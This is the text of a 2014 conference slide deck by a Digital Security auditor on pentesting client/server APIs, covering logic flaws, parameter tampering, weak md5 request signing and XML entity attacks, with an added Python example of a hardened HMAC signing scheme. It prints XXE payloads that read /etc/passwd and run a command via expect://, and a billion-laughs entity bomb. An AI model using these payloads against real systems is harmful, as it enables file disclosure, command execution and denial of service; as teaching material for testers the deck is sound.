Pentesting client/server API. Sergey Belov


© 2002—2014, Digital Security


Senior Security Auditor at Digital Security

BugHunter: Google, Yandex, Badoo, Yahoo +++

Writer: habrahabr, Xakep magazine

CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013

Speaker: CodeFest 2012, ZeroNights 0x03


What are we talking about?


Hacking via API


What should we test?

Logic!

Bypassing restrictions (sqli/xss)

Parameter tampering

Developing



42 Kb…

…10 Gb?

…100 Gb?


Say HELLO to


The evil of JavaScript and


Query signing

Sign = sha*(…+DATA+…)


Say hello again.


A=1&B=2&C=3

07ce36c769ae130708258fb5dfa3d37ca5a67514


What does the attacker know?

Original data

Sign (token)


What does the attacker want?


Can sign a new query without the API key!

Vkontakte: sig = md5(name1=value1name2=value2api_secret)

Mail.RU sig = md5(uid + params + private_key)
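Added illustration, not code from the deck or from either vendor: the md5(name1=value1name2=value2api_secret) construction above in Python, next to a hardened version. Because the sorted pairs are concatenated with no delimiter, two different parameter sets can produce the same string and therefore the same signature; the fix shown is an unambiguous canonical encoding (percent-encoded pairs joined with &) signed with HMAC-SHA256 and checked in constant time. The secret and parameter values are constructed for the demonstration.

```python
import hashlib
import hmac
import urllib.parse

# Constructed secret for the demonstration; a real api_secret never leaves the server.
API_SECRET = "example-secret"


def weak_sign(params: dict, secret: str = API_SECRET) -> str:
    """The deck's scheme: sorted name=value pairs concatenated with no delimiter,
    secret appended, plain md5 over the result."""
    body = "".join(f"{k}={v}" for k, v in sorted(params.items()))
    return hashlib.md5((body + secret).encode()).hexdigest()


def canonical(params: dict) -> str:
    """Unambiguous encoding: names and values are percent-encoded ('=' becomes %3D),
    pairs are sorted and joined with '&', so distinct parameter sets never collide."""
    return urllib.parse.urlencode(sorted(params.items()), quote_via=urllib.parse.quote)


def strong_sign(params: dict, secret: str = API_SECRET) -> str:
    """HMAC-SHA256 over the canonical string; the secret is an HMAC key, not a suffix."""
    return hmac.new(secret.encode(), canonical(params).encode(), hashlib.sha256).hexdigest()


def verify(params: dict, sig: str, secret: str = API_SECRET) -> bool:
    """Server-side check; compare_digest avoids leaking the match length via timing."""
    return hmac.compare_digest(strong_sign(params, secret), sig)


if __name__ == "__main__":
    # Two different requests whose undelimited concatenation is the same string "a=1b=2".
    one_param = {"a": "1b=2"}
    two_params = {"a": "1", "b": "2"}
    print(weak_sign(one_param) == weak_sign(two_params))      # True: same signature
    print(strong_sign(one_param) == strong_sign(two_params))  # False: canonical form differs
    print(verify(two_params, strong_sign(two_params)))        # True
```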


Request hijacking…


DTD Example:

<!ENTITY writer "Donald Duck.">

<!ENTITY copyright "Copyright W3Schools.">

XML example:


XML entities?


<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>


<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>


<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">


Testing:

https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)

XXE to RCE https://gist.github.com/joernchen/3623896

Development:


Finally:

Re-test all interface restrictions;

Specific compressions;

JS callbacks;


twitter.com/sergeybelove

sbelov@dsec.ru

Digital Security in Moscow: (495) 223-07-86

Digital Security in Saint Petersburg: (812) 703-15-47

Thanks for your attention!

Questions?
